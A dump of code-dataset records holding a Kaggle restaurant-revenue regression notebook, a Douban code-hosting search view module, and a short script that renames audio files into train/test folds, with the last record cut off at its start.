'Kırıkkale', 'Malatya', 'Mardin', 'Batman', 'Rize', 'Artvin', 'Bilecik', 'Nevşehir', 'Sivas', 'Kırşehir', 'Erzincan', 'Erzurum', 'Ordu', 'Kahramanmaraş', 'Siirt', 'Niğde', 'Giresun', 'Çankırı', 'Çorum', 'Düzce', 'Tanımsız', 'Kars'], 1,inplace=True)\n\nalldata['City Group'] = alldata['City Group'].replace(\"Big Cities\",0).replace(\"Other\",1)\n\nalldata['Type'] = alldata['Type'].replace(\"FC\",0).replace(\"IL\",1).replace(\"DT\",2).replace(\"MB\",3)\n\nalldata[\"Open Date\"] = pd.to_datetime(alldata[\"Open Date\"])\nalldata[\"Year\"] = alldata[\"Open Date\"].apply(lambda x:x.year)\nalldata[\"Month\"] = alldata[\"Open Date\"].apply(lambda x:x.month)\nalldata[\"Day\"] = alldata[\"Open Date\"].apply(lambda x:x.day)\nalldata[\"kijun\"] = \"2015-04-27\"\nalldata[\"kijun\"] = pd.to_datetime(alldata[\"kijun\"])\nalldata[\"BusinessPeriod\"] = (alldata[\"kijun\"] - alldata[\"Open Date\"]).apply(lambda x: x.days)\n\nalldata = alldata.drop('Open Date', axis=1)\nalldata = alldata.drop('kijun', axis=1)\n\nalldata\n# Check all of datatype\nalldata.dtypes\ntrain = alldata.query('train_or_test == \"train\"')\ntest = alldata.query('train_or_test == \"test\"')\n\ntarget_column = 'revenue'\ntrain_target = train[target_column]\n\ntrain_target\ndrop_column = ['Id', 'train_or_test', 'revenue']\ntrain_feature = train.drop(columns=drop_column)\n\ntrain_feature\n# Before deleting the Id column of test data, extract only the Id column used for output. The first time I merged train and test, the first index started at 137 and the index is off by that amount. It's not a problem in the final output, but I don't like the way it looks, so I'll just reindex it\ntest\n# Index reset\ntest = test.reset_index()\n# Delete unnecessary index column\ndel test[\"index\"]\ntest\n# Idカラムを、submission_idとしてだけ抜き出しておく\nsubmission_id = test['Id']\n\n# 最後のテスト出力用の説明変数データを作成。学習データとカラムを合わせて、Id, train_or_test, 9のデータが入っているrevenueを削除し、学習に必要な特徴量のみを保持\ntest_feature = test.drop(columns=drop_column)\ntest_feature\n\n# 有効な特微量を探す(SelectKBestの場合)\nfrom sklearn.feature_selection import SelectKBest, f_regression\n# 特に重要な4つの特徴量のみを探すように設定してみる\nselector = SelectKBest(score_func=f_regression, k=4) \nselector.fit(train_feature, train_target)\nmask_SelectKBest = selector.get_support() # 各特徴量を選択したか否かのmaskを取得\n\n# 有効な特微量を探す(SelectPercentileの場合)\nfrom sklearn.feature_selection import SelectPercentile, f_regression\n# 特徴量のうち40%を選択\nselector = SelectPercentile(score_func=f_regression, percentile=40) \nselector.fit(train_feature, train_target)\nmask_SelectPercentile = selector.get_support()\n\n# 有効な特微量を探す(モデルベース選択の場合:SelectFromModel)\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.ensemble import RandomForestRegressor\n# estimator として RandomForestRegressor を使用。重要度が median 以上のものを選択\nselector = SelectFromModel(RandomForestRegressor(n_estimators=100, random_state=42), threshold=\"median\") \nselector.fit(train_feature, train_target)\nmask_SelectFromModel = selector.get_support()\n\n# 有効な特微量を探す(RFE:再帰的特徴量削減 : n_features_to_select)\nfrom sklearn.feature_selection import RFE\nfrom sklearn.ensemble import RandomForestRegressor\n# estimator として RandomForestRegressor を使用。特徴量を2個選択させる\nselector = RFE(RandomForestRegressor(n_estimators=100, random_state=42), n_features_to_select=2)\nselector.fit(train_feature, train_target)\nmask_RFE = selector.get_support()\n\nprint(train.columns)\nprint(mask_SelectKBest)\nprint(mask_SelectPercentile)\nprint(mask_SelectFromModel)\nprint(mask_RFE)\n\nimportant_feature = pd.DataFrame({\"Index\":train.columns[1], \"SelectKBest\":mask_SelectKBest, \"SelectPercentile\":mask_SelectPercentile, \"SelectFromModelKBest\":mask_SelectFromModel, \"RFE\":mask_RFE})\nimportant_feature.to_csv(\"important_feature.csv\", index=False)\n\n# 読み込む\nresult = pd.read_csv('important_feature.csv')\nresult.head(50)\n# 新しいカラムを作成して合計のTrue数を記載する。その後ソートで表示する\nresult[\"Total_True_Number\"] = result.sum(axis=1)\nresult.sort_values('Total_True_Number', ascending = False)\n\n# ホールドアウト法で検証するため、あらかじめデータを学習用と検証用に分割\nX_train, X_test, y_train, y_test = train_test_split(train_feature, train_target, test_size=0.2, random_state=0, shuffle=True)\n\n# 警告が多いので、いったん警告を表示されないようにする\n# 本来は表示を消すのはお勧めしない。廃止予定の関数や例外が表示されるほうが良い\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# RandomForest==============\n\nrf = RandomForestRegressor(n_estimators=200, max_depth=5, max_features=0.5, verbose=True, random_state=0, n_jobs=-1) # RandomForest のオブジェクトを用意する\nrf.fit(X_train, y_train)\nprint('='*20)\nprint('RandomForestRegressor')\nprint(f'accuracy of train set: {rf.score(X_train, y_train)}')\nprint(f'accuracy of test set: {rf.score(X_test, y_test)}')\n\n# 学習させたRandomForestをtestデータに適用して、売上を予測しましょう\nrf_prediction = rf.predict(test_feature)\nrf_prediction\n\n'''\n# Create submission data\nrf_submission = pd.DataFrame({\"Id\":submission_id, \"Prediction\":rf_prediction})\nrf_submission.to_csv(\"RandomForest_submission.csv\", index=False)\n'''\n\n# SVR(Support Vector Regression)==============\n# ※[LibSVM]や[LibLinear]は台湾国立大学の方で開発されたらしくどうしてもその表示が入るようになっている\n\nsvr = SVR(verbose=True)\nsvr.fit(X_train, y_train)\nprint('='*20)\nprint('SVR')\nprint(f'accuracy of train set: {svr.score(X_train, y_train)}')\nprint(f'accuracy of test set: {svr.score(X_test, y_test)}')\n\nsvr_prediction = svr.predict(test_feature)\nsvr_prediction\n\n# LinearSVR==============\n\nlsvr = LinearSVR(verbose=True, random_state=0)\nlsvr.fit(X_train, y_train)\nprint('='*20)\nprint('LinearSVR')\nprint(f'accuracy of train set: {lsvr.score(X_train, y_train)}')\nprint(f'accuracy of test set: {lsvr.score(X_test, y_test)}')\n\nlsvr_prediction = lsvr.predict(test_feature)\nlsvr_prediction\n\n# SGDRegressor==============\n\nsgd = SGDRegressor(verbose=0, random_state=0)\nsgd.fit(X_train, y_train)\nprint('='*20)\nprint('SGDRegressor')\nprint(f'accuracy of train set: {sgd.score(X_train, y_train)}')\nprint(f'accuracy of test set: {sgd.score(X_test, y_test)}')\n\nsgd_prediction = sgd.predict(test_feature)\nsgd_prediction\n\n# k-近傍法(k-NN)==============\n\nknn = KNeighborsRegressor()\nknn.fit(X_train, y_train)\nprint('='*20)\nprint('KNeighborsRegressor')\nprint(f'accuracy of train set: {knn.score(X_train, y_train)}')\nprint(f'accuracy of test set: {knn.score(X_test, y_test)}')\n\nknn_prediction = knn.predict(test_feature)\nknn_prediction\n\n# 決定木==============\n\ndecisiontree = DecisionTreeRegressor(max_depth=3, random_state=0)\ndecisiontree.fit(X_train, y_train)\nprint('='*20)\nprint('DecisionTreeRegressor')\nprint(f'accuracy of train set: {decisiontree.score(X_train, y_train)}')\nprint(f'accuracy of test set: {decisiontree.score(X_test, y_test)}')\n\ndecisiontree_prediction = decisiontree.predict(test_feature)\ndecisiontree_prediction\n\n# LinearRegression (線形回帰)==============\n\nlr = LinearRegression()\nlr.fit(X_train, y_train)\nprint('='*20)\nprint('LinearRegression')\nprint(f'accuracy of train set: {lr.score(X_train, y_train)}')\nprint(f'accuracy of test set: {lr.score(X_test, y_test)}')\n# 回帰係数とは、回帰分析において座標平面上で回帰式で表される直線の傾き。 原因となる変数x(説明変数)と結果となる変数y(目的変数)の平均的な関係を、一次式y=ax+bで表したときの、係数aを指す。\nprint(\"回帰係数:\",lr.coef_)\nprint(\"切片:\",lr.intercept_)\n\nlr_prediction = lr.predict(test_feature)\nlr_prediction\n\n\n# RANSACRegressor==============\n\n# ロバスト回帰を行う(自然界のデータにはたくさんノイズがある。ノイズなどの外れ値があると、法則性をうまく見つけられないことがある。そんなノイズをうまく無視してモデルを学習させるのがRANSAC)\n#線形モデルをRANSACでラッピング (外れ値の影響を抑える)\nfrom sklearn.linear_model import RANSACRegressor\n \nransac=RANSACRegressor(lr,#基本モデルは、LinearRegressionを流用\n max_trials=100,#イテレーションの最大数100\n min_samples=50,#ランダムに選択されるサンプル数を最低50に設定\n loss=\"absolute_loss\",#学習直線に対するサンプル店の縦の距離の絶対数を計算\n residual_threshold=5.0,#学習直線に対する縦の距離が5以内のサンプルだけを正常値\n random_state=0)\n \nransac.fit(X_train, y_train)\nprint('='*20)\nprint('RANSACRegressor')\nprint(f'accuracy of train set: {lr.score(X_train, y_train)}')\nprint(f'accuracy of test set: {lr.score(X_test, y_test)}')\nprint(\"RANSAC回帰係数:\",ransac.estimator_.coef_[0])\nprint(\"RANSAC切片:\",ransac.estimator_.intercept_)\n\nransac_prediction = ransac.predict(test_feature)\nransac_prediction\n\n# RIDGE回帰==============\n\nridge = Ridge(random_state=0)\nridge.fit(X_train, y_train)\nprint('='*20)\nprint('Ridge')\nprint(f'accuracy of train set: {ridge.score(X_train, y_train)}')\nprint(f'accuracy of test set: {ridge.score(X_test, y_test)}')\n\nridge_prediction = ridge.predict(test_feature)\nridge_prediction\n\nridge_submission = pd.DataFrame({\"Id\":submission_id, \"Prediction\":ridge_prediction})\nridge_submission.to_csv(\"Ridge_submission.csv\", index=False)\n\n\n\n# LASSO回帰==============\n\nlasso = LassoCV(alphas = [1, 0.1, 0.001, 0.0005], verbose=True, random_state=0)\nlasso.fit(X_train, y_train)\nprint('='*20)\nprint('LassoCV')\nprint(f'accuracy of train set: {lasso.score(X_train, y_train)}')\nprint(f'accuracy of test set: {lasso.score(X_test, y_test)}')\n\nlasso_prediction = lasso.predict(test_feature)\nlasso_prediction\n\n\n# ElasticNet==============\n\nen = ElasticNet(random_state=0)\nen.fit(X_train, y_train)\nprint('='*20)\nprint('ElasticNet')\nprint(f'accuracy of train set: {en.score(X_train, y_train)}')\nprint(f'accuracy of test set: {en.score(X_test, y_test)}')\n\nen_prediction = en.predict(test_feature)\nen_prediction\n\n# Kernel Ridge Regression(l2制約付き最小二乗学習)==============\n\nkernelridge = KernelRidge(alpha=0.6, kernel='polynomial', degree=2, coef0=2.5)\nkernelridge.fit(X_train, y_train)\nprint('='*20)\nprint('KernelRidge')\nprint(f'accuracy of train set: {kernelridge.score(X_train, y_train)}')\nprint(f'accuracy of test set: {kernelridge.score(X_test, y_test)}')\n\nkernelridge_prediction = kernelridge.predict(test_feature)\nkernelridge_prediction\n\n\n# Gradient Boosting Regression==============\n# Boostingとは弱学習器をたくさん集めて強学習器を作ろうという話が出発点で、PAC Learningと呼ばれています\n\ngradientboost = GradientBoostingRegressor(n_estimators=3000, learning_rate=0.05, max_depth=4, max_features='sqrt', min_samples_leaf=15, min_samples_split=10, loss='huber', verbose=0, random_state=0)\ngradientboost.fit(X_train, y_train)\nprint('='*20)\nprint('GradientBoostingRegressor')\nprint(f'accuracy of train set: {gradientboost.score(X_train, y_train)}')\nprint(f'accuracy of test set: {gradientboost.score(X_test, y_test)}')\n\ngradientboost_prediction = gradientboost.predict(test_feature)\ngradientboost_prediction\n\n\n# XGB==============\n\nxgb = XGBRegressor(objective ='reg:squarederror', verbose=True, random_state=0) \nxgb.fit(X_train, y_train) \nprint('='*20)\nprint('XGBClassifier')\nprint(f'accuracy of train set: {xgb.score(X_train, y_train)}')\nprint(f'accuracy of test set: {xgb.score(X_test, y_test)}')\n\nxgb_prediction = xgb.predict(test_feature)\nxgb_prediction\n\n\n# lightgbm==============\n\nlgbm = LGBMRegressor(random_state=0)\nlgbm.fit(X_train, y_train)\nprint('='*20)\nprint('LGBMRegressor')\nprint(f'accuracy of train set: {lgbm.score(X_train, y_train)}')\nprint(f'accuracy of test set: {lgbm.score(X_test, y_test)}')\n\nlgbm_prediction = lgbm.predict(test_feature)\nlgbm_prediction\n\n\n# catboost==============\n\ncatboost = CatBoostRegressor(verbose=0, random_state=0)\ncatboost.fit(X_train, y_train)\nprint('='*20)\nprint('CatBoostRegressor')\nprint(f'accuracy of train set: {catboost.score(X_train, y_train)}')\nprint(f'accuracy of test set: {catboost.score(X_test, y_test)}')\n\ncatboost_prediction = catboost.predict(test_feature)\ncatboost_prediction\n\n\n# VotingRegressor==============\n\n# voting に使う分類器を用意する\nestimators = [\n (\"rf\", rf),\n (\"svr\", svr),\n (\"lsvr\", lsvr),\n (\"sgd\", sgd),\n (\"knn\", knn),\n (\"decisiontree\", decisiontree),\n (\"lr\", lr),\n (\"ransac\", ransac),\n (\"ridge\", ridge),\n (\"lasso\", lasso),\n (\"en\", en),\n (\"kernelridge\", kernelridge),\n (\"gradientboost\", gradientboost),\n (\"xgb\", xgb),\n (\"lgbm\", lgbm),\n (\"catboost\", catboost),\n]\n\nvote = VotingRegressor(estimators=estimators)\nvote.fit(X_train, y_train)\nprint('='*20)\nprint('VotingRegressor')\nprint(f'accuracy of train set: {vote.score(X_train, y_train)}')\nprint(f'accuracy of test set: {vote.score(X_test, y_test)}')\n\nvote_prediction = vote.predict(test_feature)\nvote_prediction\n\n\n# ※重要な特微量を探す(RandomForestを利用する)\nplt.figure(figsize=(20,10))\nplt.barh(\n X_train.columns[np.argsort(rf.feature_importances_)],\n rf.feature_importances_[np.argsort(rf.feature_importances_)],\n label='RandomForestRegressor'\n)\nplt.title('RandomForestRegressor feature importance')\n\n# ※重要な特微量を探す(決定木やXGBを利用する)\n\n\nfrom sklearn import tree\ntext_representation = tree.export_text(decisiontree)\nprint(text_representation)\n\nwith open(\"decistion_tree.log\", \"w\") as fout:\n fout.write(text_representation)\n\n\nfig = plt.figure(figsize=(25,20))\n_ = tree.plot_tree(decisiontree, \n feature_names=X_train.columns, \n class_names=target_column,\n filled=True)\nfig.savefig(\"decistion_tree.png\")\n\nimport graphviz\n# DOT data\ndot_data = tree.export_graphviz(decisiontree, out_file=None, \n feature_names=X_train.columns, \n class_names=target_column,\n filled=True)\n\n# Draw graph\ngraph = graphviz.Source(dot_data, format=\"png\") \ngraph\ngraph.render(\"decision_tree_graphivz\")\n'decision_tree_graphivz.png'\n\n# 重要度を出力\nfor n, v in zip(X_train.columns, decisiontree.feature_importances_):\n print(f'importance of {n} is :{v}')\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# RandomForest==============\n\nkf = KFold(n_splits = 5, shuffle = True, random_state=0)\n\nrf = RandomForestRegressor(n_estimators=200, max_depth=5, max_features=0.5, verbose=True, random_state=0, n_jobs=-1) # RandomForest のオブジェクトを用意する\nrf_cross_score = cross_validate(rf, train_feature, train_target, cv=kf)\nrf_cross_score\nprint('='*20)\nprint('RandomForestRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{rf_cross_score[\"test_score\"].mean()}, 標準偏差 std:{rf_cross_score[\"test_score\"].std()}')\nprint(\"交差検証トレーニングのscore:\",format(rf_cross_score))\n#print(\"交差検証テストのscore:\",format(np.mean(rf_cross_score)))\n\n# SVR(Support Vector Regression)==============\n# ※[LibSVM]や[LibLinear]は台湾国立大学の方で開発されたらしくどうしてもその表示が入るようになっている\n\nsvr = SVR(verbose=True)\nsvr_cross_score = cross_validate(svr, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('SVR 交差検証(Cross-validation)')\nprint(f'平均値 mean:{svr_cross_score[\"test_score\"].mean()}, 標準偏差 std:{svr_cross_score[\"test_score\"].std()}')\n\n# LinearSVR==============\n\nlsvr = LinearSVR(verbose=True, random_state=0)\nlsvr_cross_score = cross_validate(lsvr, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('LinearSVR 交差検証(Cross-validation)')\nprint(f'平均値 mean:{lsvr_cross_score[\"test_score\"].mean()}, 標準偏差 std:{lsvr_cross_score[\"test_score\"].std()}')\n\n\n# SGDRegressor==============\n\nsgd = SGDRegressor(verbose=0, random_state=0)\nsgd_cross_score = cross_validate(sgd, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('SGDRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{sgd_cross_score[\"test_score\"].mean()}, 標準偏差 std:{sgd_cross_score[\"test_score\"].std()}')\n\n\n# k-近傍法(k-NN)==============\n\nknn = KNeighborsRegressor()\nknn_cross_score = cross_validate(knn, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('KNeighborsRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{knn_cross_score[\"test_score\"].mean()}, 標準偏差 std:{knn_cross_score[\"test_score\"].std()}')\n\n\n\n# 決定木==============\n\ndecisiontree = DecisionTreeRegressor(max_depth=3, random_state=0)\ndecisiontree_cross_score = cross_validate(decisiontree, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('DecisionTreeRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{decisiontree_cross_score[\"test_score\"].mean()}, 標準偏差 std:{decisiontree_cross_score[\"test_score\"].std()}')\n\n\n\n\n# LinearRegression (線形回帰)==============\n\nlr = LinearRegression()\nlr_cross_score = cross_validate(lr, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('LinearRegression 交差検証(Cross-validation)')\nprint(f'平均値 mean:{lr_cross_score[\"test_score\"].mean()}, 標準偏差 std:{lr_cross_score[\"test_score\"].std()}')\n\n\n# RANSACRegressor==============\n\n# ロバスト回帰を行う(自然界のデータにはたくさんノイズがある。ノイズなどの外れ値があると、法則性をうまく見つけられないことがある。そんなノイズをうまく無視してモデルを学習させるのがRANSAC)\n#線形モデルをRANSACでラッピング (外れ値の影響を抑える)\nfrom sklearn.linear_model import RANSACRegressor\n \nransac=RANSACRegressor(lr,#基本モデルは、LinearRegressionを流用\n max_trials=100,#イテレーションの最大数100\n min_samples=50,#ランダムに選択されるサンプル数を最低50に設定\n loss=\"absolute_loss\",#学習直線に対するサンプル店の縦の距離の絶対数を計算\n residual_threshold=5.0,#学習直線に対する縦の距離が5以内のサンプルだけを正常値\n random_state=0)\n \nransac_cross_score = cross_validate(ransac, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('RANSACRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{ransac_cross_score[\"test_score\"].mean()}, 標準偏差 std:{ransac_cross_score[\"test_score\"].std()}')\n\n\n# RIDGE回帰==============\n\nridge = Ridge(random_state=0)\nridge_cross_score = cross_validate(ridge, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('Ridge 交差検証(Cross-validation)')\nprint(f'平均値 mean:{ridge_cross_score[\"test_score\"].mean()}, 標準偏差 std:{ridge_cross_score[\"test_score\"].std()}')\n\n\n\n\n# LASSO回帰==============\n\nlasso = LassoCV(alphas = [1, 0.1, 0.001, 0.0005], verbose=True, random_state=0)\nlasso_cross_score = cross_validate(lasso, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('LassoCV 交差検証(Cross-validation)')\nprint(f'平均値 mean:{lasso_cross_score[\"test_score\"].mean()}, 標準偏差 std:{lasso_cross_score[\"test_score\"].std()}')\n\n\n# ElasticNet==============\n\nen = ElasticNet(random_state=0)\nen_cross_score = cross_validate(en, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('ElasticNet 交差検証(Cross-validation)')\nprint(f'平均値 mean:{en_cross_score[\"test_score\"].mean()}, 標準偏差 std:{en_cross_score[\"test_score\"].std()}')\n\n\n# Kernel Ridge Regression(l2制約付き最小二乗学習)==============\n\nkernelridge = KernelRidge(alpha=0.6, kernel='polynomial', degree=2, coef0=2.5)\nkernelridge_cross_score = cross_validate(kernelridge, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('KernelRidge 交差検証(Cross-validation)')\nprint(f'平均値 mean:{kernelridge_cross_score[\"test_score\"].mean()}, 標準偏差 std:{kernelridge_cross_score[\"test_score\"].std()}')\n\n\n# Gradient Boosting Regression==============\n# Boostingとは弱学習器をたくさん集めて強学習器を作ろうという話が出発点で、PAC Learningと呼ばれています\n\ngradientboost = GradientBoostingRegressor(n_estimators=3000, learning_rate=0.05, max_depth=4, max_features='sqrt', min_samples_leaf=15, min_samples_split=10, loss='huber', verbose=0, random_state=0)\ngradientboost_cross_score = cross_validate(gradientboost, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('GradientBoostingRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{gradientboost_cross_score[\"test_score\"].mean()}, 標準偏差 std:{gradientboost_cross_score[\"test_score\"].std()}')\n\n\n# XGB==============\n\nxgb = XGBRegressor(objective ='reg:squarederror', verbose=True, random_state=0) \nxgb_cross_score = cross_validate(xgb, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('XGBClassifier 交差検証(Cross-validation)')\nprint(f'平均値 mean:{xgb_cross_score[\"test_score\"].mean()}, 標準偏差 std:{xgb_cross_score[\"test_score\"].std()}')\n\n\n# lightgbm==============\n\nlgbm = LGBMRegressor(random_state=0)\nlgbm_cross_score = cross_validate(lgbm, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('LGBMRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{lgbm_cross_score[\"test_score\"].mean()}, 標準偏差 std:{lgbm_cross_score[\"test_score\"].std()}')\n\n\n# catboost==============\n\ncatboost = CatBoostRegressor(verbose=0, random_state=0)\ncatboost_cross_score = cross_validate(catboost, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('CatBoostRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{catboost_cross_score[\"test_score\"].mean()}, 標準偏差 std:{catboost_cross_score[\"test_score\"].std()}')\n\n","repo_name":"aorursy/new-nb-3","sub_path":"hiro1005_restaurant-revenue-prediction.py","file_name":"hiro1005_restaurant-revenue-prediction.py","file_ext":"py","file_size_in_byte":26356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43025070772","text":"# -*- coding: utf-8 -*-\n\nimport json\nfrom urllib import urlencode\n\nfrom quixote.errors import TraversalError\n\nfrom vilya.libs.template import st\nfrom vilya.models.elastic.searcher import SearchEngine\nfrom vilya.models.elastic import CodeSearch\nfrom vilya.models.elastic.src_search import SrcSearch\nfrom vilya.models.elastic.repo_search import RepoSearch\nfrom vilya.models.elastic.user_search import UserSearch\nfrom vilya.models.elastic.issue_pr_search import PullRequestSearch, IssueSearch\nfrom vilya.models.elastic.consts import (\n SEARCH_URL_ROOT, ADMINS, K_REPO, K_CODE, K_USER, K_DOC, K_PULL, K_ISSUE,\n PERPAGE_LIMIT, SEARCH_KINDS, KIND_ORDERS_MAP, CODE_ORDERS)\nfrom vilya.models.project import CodeDoubanProject\nfrom vilya.views.util import require_login\nfrom tasks import index_srcs_action, index_repos_action, index_users_action\n\nKIND_CLASS_MAP = {\n K_REPO: RepoSearch,\n K_CODE: SrcSearch,\n K_DOC: CodeSearch,\n K_USER: UserSearch,\n K_PULL: PullRequestSearch,\n K_ISSUE: IssueSearch,\n}\n\n\nclass SearchUI(object):\n\n _q_exports = ['count', 'xml']\n\n def __init__(self, project=None):\n self.project = project\n\n def _q_index(self, request):\n q = request.get_form_var('q', '')\n kind = request.get_form_var('kind', str(K_CODE))\n order = request.get_form_var('s', '')\n order = int(order) if order else ''\n page = request.get_form_var('page')\n page = int(page) if page and page.isdigit() else 1\n project = CodeDoubanProject.get_by_name(self.project) \\\n if self.project else None\n state = request.get_form_var('state', '')\n language = request.get_form_var('language', '')\n doctype = request.get_form_var('doctype', '')\n\n if not kind.isdigit() and int(kind) not in SEARCH_KINDS:\n raise TraversalError()\n\n kind = int(kind)\n orders = KIND_ORDERS_MAP.get(kind, CODE_ORDERS)\n sort_data = orders.get(order)\n if sort_data:\n sort_data = sort_data[1]\n\n limit = PERPAGE_LIMIT\n total = 0\n offset = (page - 1) * limit\n result = {}\n formated_result = []\n facets = {}\n tdt = {}\n\n cls = KIND_CLASS_MAP.get(kind)\n\n by_project = by_language = by_state = by_doctype = False\n if project and kind in (K_DOC, K_CODE, K_PULL, K_ISSUE):\n by_project = True\n if language and kind == K_CODE:\n by_language = True\n if state and kind in (K_PULL, K_ISSUE):\n by_state = True\n if doctype and kind == K_DOC:\n by_doctype = True\n\n # for facets\n if kind in (K_CODE, K_PULL, K_ISSUE, K_DOC):\n project_id = project.id if by_project else None\n result = cls.search_a_phrase(\n phrase=q, from_=0, size=0, project_id=project_id)\n facets = cls.format_facets(result)\n for title, data in facets.iteritems():\n for item in data:\n params = {'q': q, 'kind': kind, 's': order,\n title: item['term']}\n if by_project:\n params.update(project_id=project_id)\n item['url'] = '?' + urlencode(params)\n # highlight current term\n current = None\n if by_language:\n current = language\n elif by_state:\n current = state\n elif by_doctype:\n current = doctype\n if current and current == item['term']:\n item['selected'] = True\n del params[title]\n item['url'] = '?' + urlencode(params)\n\n # for search\n kwargs = dict(phrase=q, sort_data=sort_data, from_=offset, size=limit)\n if by_project:\n kwargs.update(project_id=project.id)\n if by_language:\n kwargs.update(language=language)\n if by_state:\n kwargs.update(state=state)\n if by_doctype:\n kwargs.update(doctype=doctype)\n\n result = cls.search_a_phrase(**kwargs)\n formated_result = cls.format_search_result(result)\n total = SearchEngine.get_count(result)\n pages = total / limit + 1 if total % limit > 0 else total / limit\n tdt.update(request=request, q=q, kind=kind, total=total, facets=facets,\n language=language, state=state, doctype=doctype,\n result=formated_result, orders=orders, s=order, page=page,\n pages=pages)\n\n # for menu and pagenation\n SEARCH_URLS = dict()\n for k in SEARCH_KINDS:\n if project and k in (K_CODE, K_DOC, K_PULL, K_ISSUE):\n url_root = '/%s/search' % project.name\n else:\n url_root = SEARCH_URL_ROOT\n params = {'q': q, 'kind': k, 's': order}\n if state and k in (K_PULL, K_ISSUE):\n params.update({'state': state})\n if language and k == K_CODE:\n params.update({'language': language})\n if doctype and k == K_DOC:\n params.update({'doctype': doctype})\n url = '%s?' % url_root + urlencode(params)\n SEARCH_URLS[k] = url\n\n tdt.update(SEARCH_URLS=SEARCH_URLS)\n\n return st('search/base.html', **tdt)\n\n def count(self, request):\n request.response.set_content_type('application/json; charset=utf8')\n q = request.get_form_var('q', '')\n project = CodeDoubanProject.get_by_name(self.project) \\\n if self.project else None\n state = request.get_form_var('state', '')\n language = request.get_form_var('language', '')\n doctype = request.get_form_var('doctype', '')\n counts = {}\n\n for kind, cls in KIND_CLASS_MAP.iteritems():\n kwargs = dict(phrase=q, from_=0, size=0)\n if project and kind in (K_DOC, K_CODE, K_PULL, K_ISSUE):\n kwargs.update(project_id=project.id)\n if language and kind == K_CODE:\n kwargs.update(language=language)\n if state and kind in (K_PULL, K_ISSUE):\n kwargs.update(state=state)\n if doctype and kind == K_DOC:\n kwargs.update(doctype=doctype)\n result = cls.search_a_phrase(**kwargs)\n counts[kind] = SearchEngine.get_count(result)\n\n tdt = {\n 'q': q,\n 'repos': counts[K_REPO],\n 'codes': counts[K_CODE],\n 'users': counts[K_USER],\n 'docs': counts[K_DOC],\n 'pulls': counts[K_PULL],\n 'issues': counts[K_ISSUE],\n }\n return json.dumps(tdt)\n\n def _q_lookup(self, request, urlpart):\n if urlpart == 'repo_index':\n return RepoIndexUI()\n elif urlpart == 'user_index':\n return UserIndexUI()\n\n def xml(self, request):\n request.response.set_content_type(\n 'application/opensearchdescription+xml')\n return st('search/firefox_search.xml')\n\n\nclass SrcIndexUI(object):\n _q_exports = []\n _actions = ['update', 'create', 'delete', 'update_mapping',\n 'delete_mapping']\n\n def __init__(self, project_name):\n self.project = CodeDoubanProject.get_by_name(project_name)\n\n @require_login\n def _q_lookup(self, request, action):\n if (request.user.name in ADMINS\n and self.project and (action in self._actions)):\n index_srcs_action(action, self.project.id)\n return request.redirect(SEARCH_URL_ROOT + '?kind=%s' % K_CODE)\n raise TraversalError()\n\n\nclass RepoIndexUI(object):\n _q_exports = []\n _actions = ['update', 'create', 'delete', 'delete_mapping']\n\n @require_login\n def _q_lookup(self, request, action):\n if (request.user.name in ADMINS\n and (action in self._actions)):\n index_repos_action(action)\n return request.redirect(SEARCH_URL_ROOT + '?kind=%s' % K_REPO)\n raise TraversalError()\n\n\nclass UserIndexUI(object):\n _q_exports = []\n _actions = ['update', 'create', 'delete', 'delete_mapping']\n\n @require_login\n def _q_lookup(self, request, action):\n if (request.user.name in ADMINS\n and (action in self._actions)):\n index_users_action(action)\n return request.redirect(SEARCH_URL_ROOT + '?kind=%s' % K_USER)\n","repo_name":"douban/code","sub_path":"vilya/views/hub/search_beta.py","file_name":"search_beta.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","stars":1812,"dataset":"github-code","pt":"18"} +{"seq_id":"3320692296","text":"'''\ntrain vs test\ndcase synth : fold 1, 2 \ndcase stars : fold 3, 4\nlocata: fold 5(orig eval), 6(orig dev)\nmetu: fold 7, 8 Train vs test [146, 98]\nmarco: fold 9, 10\n'''\n\n#imports\nimport os\n\n#marco\nmetu_fold = {'test':'fold8_', 'train':'fold7_'}\n\nmetu_meta = '/vast/sk8974/experiments/dsynth/data/input/gen_dcase_stars_loc_metu_marco/metadata_dev/metu'\nmetu_mic = '/vast/sk8974/experiments/dsynth/data/input/gen_dcase_stars_loc_metu_marco/mic_dev/metu'\n\ndef is_train(file):\n x,y,z = int(file[0]), int(file[1]), int(file[2])\n if z-2>=0:\n return True\n\nfor dir_type in [metu_mic]:\n for file in os.listdir(dir_type):\n if not is_train(file):\n src = os.path.join(dir_type,file)\n dst = os.path.join(dir_type,metu_fold['test']+file)\n os.rename(src,dst)\n else:\n src = os.path.join(dir_type,file)\n dst = os.path.join(dir_type,metu_fold['train']+file)\n os.rename(src,dst)","repo_name":"sakshamsingh1/sound_distance_estimation","sub_path":"helper/metu-sparg/rename_fold.py","file_name":"rename_fold.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4602372550","text":"with open(\"questions.txt\",\"r\") as f1:\n 